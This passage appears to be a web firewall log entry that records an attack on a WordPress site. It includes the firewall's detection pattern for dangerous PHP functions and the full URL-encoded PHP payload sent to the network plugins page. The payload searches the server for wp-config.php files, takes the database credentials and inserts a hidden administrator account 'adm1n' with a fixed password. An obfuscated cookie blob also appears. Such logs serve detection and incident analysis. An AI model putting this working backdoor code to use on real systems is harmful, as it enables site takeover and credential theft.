C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 18:05:41","213.209.159.254","POST","\/wp-admin\/network\/plugins.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> dF:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-admin\/network\/plugins.php HTTP\/1.1\naccept:*\/*\naccept-encoding:gzip,deflate\ncontent-type:application\/x-www-form-urlencoded\ncontent-length:12640\ncookie:4=730da3e67a08a749df0620450f4abf2e; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvMRLvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaOip3DvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\n\ndF=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%2